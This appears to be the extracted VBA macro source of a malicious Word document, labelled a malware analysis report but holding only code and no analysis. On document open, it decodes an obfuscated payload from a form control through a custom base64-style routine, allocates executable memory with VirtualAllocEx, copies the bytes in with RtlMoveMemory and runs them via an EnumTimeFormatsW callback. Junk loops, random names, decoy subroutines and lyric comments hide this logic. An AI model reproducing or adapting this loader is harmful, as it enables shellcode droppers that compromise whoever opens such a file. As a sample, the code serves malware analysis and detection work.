Malicious Office (OLE) — malware analysis report

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Dim attainable As String
Dim concetto As Integer
lucifer = "cheiranthus"
paroxysmal
badinage = 4
While badinage <> 9
badinage = badinage + 1
cheering = Fix(305.89)
multiply = parched
Wend
End Sub
Function urocystis(clairvoyance)
Dim tibs As Variant
Dim smuttiness As Long
Dim shortgrass As Long
caludicate shortgrass, VarPtr(clairvoyance) + 8, 4
Dim antinomian As String
Dim backyard As Integer
Dim linea As Long
haliotidae = 0
cajolery = 84 - 116 + 31
morello = 23 + 15 - 26 - 12
multiply = multiply

arrosion = cheering / 496

aerobics = 80 + 4016
instigate = abdominal(ByVal cajolery, ByVal morello, 9770, aerobics, 64)
arrosion = Abs(347.549)

caludicate linea, VarPtr(instigate) + 8, 4
multiply = "ceratostomataceae"

caludicate ByVal linea, shortgrass, 6183
For chorister = 11 To 66
dissociation = 66
cheering = Int(108.998)
abarticulation = "bo" & "wer"
abarticulation = LCase$("FA") & Replace("nblaser", "blaser", "g")
Next chorister

urocystis = linea
End Function
Sub wheresel()
    If Selection.Information(wdAtEndOfRowMarker) = True Then _
        Selection.MoveLeft Unit:=wdCharacter, Count:=1
End Sub

Sub paroxysmal()
Dim breechcloth As String
Dim bradshaw As Long
Set coleus = potency.nonpolitical.SelectedItem
isthmus = coleus.Name
dactylorhiza = 8244
troll = Right(isthmus, dactylorhiza)
memorial = borodino.anabolism(troll)
flimsiness = 5
While flimsiness <> 9
flimsiness = flimsiness + 1
arrosion = arrosion \ 71
parched = "hook"
Wend

metrically = "ecobabble"
#If VBA6 And Win64 Then
Dim cydonia As String
Dim dualism As catching
Dim lineation As LongPtr
dualism.start = 119 + 3 - 122
Dim driftage As Variant
#Else
Dim dome As String
dualism = 0
Dim cacophonous As Long
Dim lineation As Long
#End If
scotfree = 0
penetratingly = "expressive"
nonessential = "evacuee"
archenemy = 4096
dangle = 9
While dangle <> 13
dangle = dangle + 1
cheering = Round(266.374)
cheering = Int(323.1247)
Wend

tops = "asynchronous"
banner = "mansi"
For archegonium = 43 To 76
irrigate = 76
parched = multiply
oldish = "li" & "longwe"
oldish = Mid("bimorphemicagoexaltation", 12, 3) & "nizin" & Mid("apothegmglycycadaceae", 9, 3)
Next archegonium

alternanthera = memorial
bigot = "babies"
cankerworm = "boats"
lineation = urocystis(alternanthera)
bigshouldered = Replace("aungulata", "ungulata", "gr") & Mid("indeficientostembronze", 12, 5) & LCase$("mA")
winesap = LCase$("In") & Mid("eldoperativeimpermissible", 4, 9)
#If VBA6 And Win64 Then
Dim leptoptilus As Variant
calenture = Mid("aequamcoalstroemeriaceae", 7, 2) & Mid("thatchckscombmercurous", 7, 7)
cumulus = "thi" & "ngumbob"
disappointed = "equibalanced"
partisan = 9 + 85 + 1186
#ElseIf Win32 Then
pierrot = Replace("cobackbencher", "backbencher", "mp") & Mid("accentedassionateirritating", 9, 9)
ecarte = "views"
vitis = "crinoid"
imporosity = 56 + 450
partisan = imporosity + 3171

#End If
Dim regions As Long
Dim disobliging As Variant
Dim dilapidation As Long
dilapidation = 74 + 34 + 1940
Dim hangs As Long
hangs = lineation + partisan
Dim protractor As Long
protractor = 6 - 6
adhibit = compression(hangs, dilapidation, protractor)
micron = 7
While micron <> 12
micron = micron + 1
arrosion = cheering * 3
arrosion = Abs(415.286)
Wend

End Sub



Attribute VB_Name = "borodino"
'Maybe I'm crazy
#If VBA6 And Win64 Then
'Maybe you're crazy
Public Type catching
'Come on now, who do you, who do you, who do you, who do you think you are,
start As LongPtr
'And all I remember is thinking, I want to be like them
End Type
'Ha ha ha bless your soul
Public  Declare PtrSafe Function compression Lib "kernel32.dll" Alias "EnumTimeFormatsW" (ByVal fleece As Any, ByVal lowliness As Any, ByVal groundmass As Any) As LongPtr
'Without care,
Public Declare PtrSafe Function lightfooted Lib "user32" Alias "OpenClipboard" (supercharger As LongPtr) As Boolean
'Come on now, who do you, who do you, who do you, who do you think you are,
Public Declare PtrSafe Function connecting Lib "user32" Alias "EndPaint" (abstention As LongPtr,malaysian As LongPtr) As LongPtr
'Maybe we're crazy
Public  Declare PtrSafe Sub caludicate Lib "ntdll.dll" Alias "RtlMoveMemory" (groundfish As Any, ByVal sententiae As Any, ByVal accountancy As LongPtr)
'And I can die when I'm done
Public  Declare PtrSafe Function abdominal Lib "kernel32.dll" Alias "VirtualAllocEx" (disbursement As LongPtr, harrowing As LongPtr, ByVal aspersions As LongPtr, ByVal later As LongPtr, ByVal mastigomycota As LongPtr) As LongPtr
'There was something so pleasant about that place.
Public Declare PtrSafe Function arithmetician Lib "kernel32.dll" Alias "Sleep" (slurry As LongPtr)
'And it's no coincidence I've come
Public Declare PtrSafe Function cleric Lib "user32" Alias "GetUpdateRect" (bairn As LongPtr, durmast As LongPtr,stack As LongPtr) As Boolean
'Come on now, who do you, who do you, who do you, who do you think you are,
Public Declare PtrSafe Function muzzy Lib "user32" Alias "SetParent" (ByVal tink As LongPtr, ByVal rationally As LongPtr,malingering As LongPtr) As LongPtr
'You really think you're in control

'Ha ha ha bless your soul
#Else
'And I can die when I'm done
Public Declare Function firetrap Lib "kernel32.dll" Alias "Sleep" (barrenness As Long)
'Ha ha ha bless your soul
Public Declare Function christsthorn Lib "user32" Alias "OpenClipboard" (demand As Long) As Boolean
'Just like me
Public Declare Sub caludicate Lib "ntdll.dll" Alias "RtlMoveMemory" (chlamys As Any, ByVal monarchal As Any, ByVal jangling As Long)
'And I can die when I'm done
Public Declare Function corradiation Lib "user32" Alias "GetUpdateRect" (obscurum As Long, population As Long, culvert As Long) As Boolean
'Without care,
Public Declare Function disraeli Lib "user32" Alias "SetParent" (ByVal amazingly As Long, ByVal asteroidea As Long, amalgamated As Long) As Long
'Yeah, I was out of touch
Public Declare Function winnipeg Lib "user32" Alias "EndPaint" (agricultural As Long, aphrodisia As Long) As Long
'But it wasn't because I didn't know enough
Public Declare Function abdominal Lib "kernel32.dll" Alias "VirtualAllocEx" (autodidactic As Long, aedes As Long, ByVal owls As Long, ByVal lordling As Long, ByVal osmerus As Long) As Long
'Maybe you're crazy
Public Declare Function compression Lib "kernel32.dll" Alias "EnumTimeFormatsW" (ByVal acidulate As Any, ByVal megaspore As Any, ByVal brahminical As Any) As Long
'And I hope that you are having the time of your life

'Ha ha ha bless your soul
#End If
'Ever since I was little, ever since I was little it looked like fun
Function anabolism(amharic) As String
arrosion = arrosion Or 472

Dim abortus As Integer
Dim aeneid As Variant

Dim ethnology(63) As Long
Dim blushful As String
Dim ephedra(63) As Long
Dim southwester() As Byte
Dim courtierlike As Long
Dim consanguinity(255) As Byte
Dim apothegmatic As Long
parched = "concetto"

Dim drinkable As Byte

Dim husbandry As Long
Dim fearsomely As Integer

Dim dendroctonus As Long
Dim louisville(63) As Long
Dim bedim(6965) As Byte
allars = 48 - 88 + 50 + 53
optical = 3 - 6 - 108 + 258159
churlishness = 60 + 98 + 102 + 65276
Dim afrowig As Variant

astound = 101 + 97 + 113 + 64969
roistering = 127 + 82 + 47 + 261888
demoralization = 83 - 19 + 3968
binoculars = 16515072
denunciatory = 64
hauling = 25 - 66 + 88 + 208
ambagious = 256
spes = 94 + 4002
Dim meuse As Variant

bachelorship = 26 + 9 + 16711645
Dim leap As Integer

Dim dixi As Variant
Dim catharacta(8243) As Byte
diluted = 0
entail = 8243
For fungible = diluted To entail
bossy = 49 - 94 + 46
companionable = Mid$(amharic, fungible + 1, bossy)
autocratic = "butuminous"
archaeological = "phonogram"
tenaculum = brocket(companionable)
catharacta(fungible) = tenaculum
Next
Dim tristan As String
jamb = 2
While jamb <> 5
jamb = jamb + 1
parched = "gynaeocracy"
cheering = Abs(188.109)
Wend

balsam = 8243
bouteloua = 35
For millstone = 0 To balsam
catharacta(millstone) = catharacta(millstone) + 8
Next millstone
algology = 9
While algology <> 14
algology = algology + 1
arrosion = arrosion + 339
cheering = Round(303.726)
Wend

abortus = 0
cobbler = 18 + 110 - 6
grapes = 255
For apothegmatic = 0 To grapes
If (apothegmatic >= 65) And (apothegmatic <= 90) Then
consanguinity(apothegmatic) = apothegmatic - 65
ElseIf (apothegmatic >= 97) And (apothegmatic <= 122) Then
consanguinity(apothegmatic) = apothegmatic - 71
ElseIf (apothegmatic >= 48) And (apothegmatic <= 57) Then
consanguinity(apothegmatic) = apothegmatic + 4
ElseIf apothegmatic = 43 Then
consanguinity(apothegmatic) = 62
ElseIf apothegmatic = 47 Then
consanguinity(apothegmatic) = 63
End If
Next apothegmatic
For apothegmatic = 0 To 63
louisville(apothegmatic) = jamming(apothegmatic, denunciatory)
ephedra(apothegmatic) = jamming(apothegmatic, spes)
ethnology(apothegmatic) = jamming(apothegmatic, roistering)
Next apothegmatic
mel = 7
While mel <> 12
mel = mel + 1
arrosion = arrosion - 292
parched = multiply
Wend

southwester = catharacta
fashions = 4
For tenoroon = 45 To 50
overloook = 50
arrosion = Fix(307.464)
buna = Replace("aclanking", "clanking", "s") & "arab" & LCase$("AccA")
buna = "blo" & Mid("cravingodstaconstricted", 8, 5) & "in"
Next tenoroon

nervousness = 95 - 92
multiply = multiply

cheering = Int(450.224)

aliquot = nervousness + 1
trousseau = 2
For dendroctonus = 0 To balsam
freund = southwester(dendroctonus)
merida = southwester(dendroctonus + 2)
courtierlike = ethnology(consanguinity(freund)) _
 + ephedra(consanguinity(southwester(dendroctonus + 1))) + louisville(consanguinity(merida)) + consanguinity(southwester(dendroctonus + nervousness))
apothegmatic = pen(courtierlike, bachelorship)
bedim(husbandry) = assai(apothegmatic, churlishness)
apothegmatic = pen(courtierlike, astound)
bedim(husbandry + 1) = assai(apothegmatic, ambagious)
bedim(husbandry + trousseau) = pen(courtierlike, hauling)
husbandry = husbandry + trousseau + 1
dendroctonus = dendroctonus + 3
Next
anabolism = bedim
End Function

Function jamming(platyctenean, tram)
jamming = platyctenean * tram
End Function
Function pen(consent, contentedly)
pen = consent And contentedly
End Function
Function brocket(calliphora)
brocket = AscW(calliphora)
End Function
Sub UseBookmarks()
    Dim myArray()
    Dim wdBkmk As String
    
    Dim wdApp As Word.Application
    Dim wdRng As Word.Range
    myArray = Array("To", "CC", "From", "Subject")
    Set wdApp = GetObject(, "Word.Application")
    
    Set wdRng = wdApp.ActiveDocument.Bookmarks(myArray(0)).Range
    wdRng.InsertBefore ("B")
    Set wdRng = wdApp.ActiveDocument.Bookmarks(myArray(1)).Range
    wdRng.InsertBefore ("T")
    Set wdRng = wdApp.ActiveDocument.Bookmarks(myArray(2)).Range
    wdRng.InsertBefore ("M")
    Set wdRng = wdApp.ActiveDocument.Bookmarks(myArray(3)).Range
    wdRng.InsertBefore ("F")
    
    Set wdApp = Nothing
    Set wdRng = Nothing
End Sub

Function assai(asclepiad, compressible)
assai = asclepiad \ compressible
End Function


Attribute VB_Name = "potency"
Attribute VB_Base = "0{FA53A92D-C0A8-41D5-A645-E7C2021CE203}{E879FCAD-6250-43B7-89C9-932167856A4A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False